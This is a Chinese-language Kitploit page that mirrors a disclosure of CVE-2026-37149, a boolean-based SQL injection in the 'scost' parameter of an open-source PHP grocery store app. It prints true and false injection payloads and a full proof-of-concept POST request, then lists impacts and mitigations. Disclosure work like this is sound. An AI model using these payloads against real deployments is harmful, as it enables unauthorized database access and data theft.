Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-37149 — CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 中 search_products.php 的 scost 参数存在 SQL 注入漏洞。 | Kitploit
工具/GitHubGitHub/pateldhyeyit/cve-2026-37149
漏洞分析Web应用程序漏洞利用信息收集渗透测试学习与教育数据库安全
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 中 search_products.php 的 scost 参数存在 SQL 注入漏洞。

查看仓库
222个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-37149 SQL注入漏洞在 GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 中

概述

  • CVE ID: CVE-2026-37149
  • 漏洞类型: SQL注入 (CWE-89)
  • 严重性: 高
  • 发现者: Dhyey Patel

描述

GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 包含一个 SQL 注入漏洞,位于 "/grocery/search_products.php" 的 "scost" 参数中。

应用程序在将用户输入嵌入 SQL 查询之前未能正确验证这些输入。攻击者可以通过易受攻击的参数注入精心构造的 SQL 表达式,并操纵后端数据库查询。

成功利用此漏洞可能导致未经授权访问敏感数据库信息以及执行任意 SQL 语句。

受影响产品

  • 产品: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN
  • 版本: v1.0
  • 供应商仓库: https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

受影响组件

  • "/grocery/search_products.php"
  • POST 参数: "scost"

攻击类型 远程

供应商信息 开源项目由仓库所有者维护: https://github.com/anirudhkannanvp

技术细节

该漏洞通过基于布尔的SQL注入技术确认。

True条件载荷

-1 OR 321=6 AND 000483=000483 --

False条件载荷

-1 OR 320=6 AND 000483=000483 --

应用程序的响应根据注入条件的真假而变化,从而确认了SQL注入的存在。

进一步的测试确认了以下SQL函数能够成功执行:

SELECT database()

返回的数据库名称为:

grocery

这表明可以通过该易受攻击的参数执行任意SQL查询。

概念验证

请求

POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded

scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products

结果

响应根据注入的布尔条件而变化,确认 "scost" 参数存在SQL注入漏洞。

影响

潜在影响包括:

  • 数据库枚举
  • 敏感信息泄露
  • 认证绕过
  • 数据提取
  • 修改数据库记录

缓解措施

开发者应:

  1. 使用预编译语句。
  2. 使用参数化SQL查询。
  3. 验证数字输入参数。
  4. 实施服务端输入验证。
  5. 避免直接将用户控制的输入拼接到SQL语句中。

参考

  • OWASP SQL Injection
  • MITRE CVE Program

致谢 由 Dhyey Patel 发现并报告。

下载工具